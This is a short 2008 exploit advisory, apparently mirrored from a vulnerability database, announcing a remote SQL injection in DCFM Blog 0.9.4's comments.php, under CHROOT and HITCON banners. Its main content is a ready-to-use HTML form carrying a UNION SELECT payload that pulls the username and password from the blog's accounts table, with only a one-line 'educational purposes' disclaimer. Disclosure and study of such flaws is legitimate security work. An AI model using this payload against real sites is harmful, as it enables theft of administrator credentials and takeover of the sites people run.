Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19998
HistoryJun 10, 2008 - 12:00 a.m.

[web-app] DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability

2008-06-1000:00:00
vulners.com
21

/ | || | _ \| _ | _ | |
| (
| _ | [)/| () | () | | |
\_____|
| ||| ||||| ||
C. H. R. O. O. T. SECURITY GROUP
- – ----- — – – ---- — – -
http://www.chroot.org

                      _   _ _ _____ ____ ____ __  _ 
    Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
    Conference 2008  |  _  | | | | | (__| () |     |
                     |_| |_|_| |_| \____|____|_|\__|
                                  http://www.hitcon.org

Title =======:: DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: DCFM Blog

Download ====:: http://nchc.dl.sourceforge.net/sourceforge/dcfm-blog/blog_files_0-9-4.zip

Mirror ======:: http://www.badongo.com/file/9630703


[SQL Injection]

  • {comments.php} -

<form action="http://localhost/dcfmblog/comments.php&quot; method="post">
<input type="text" name="id" size=50 value="-99' union select 0,username,password from accounts where id=1/*">
<input type="submit" value=" send ">
</form>


[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!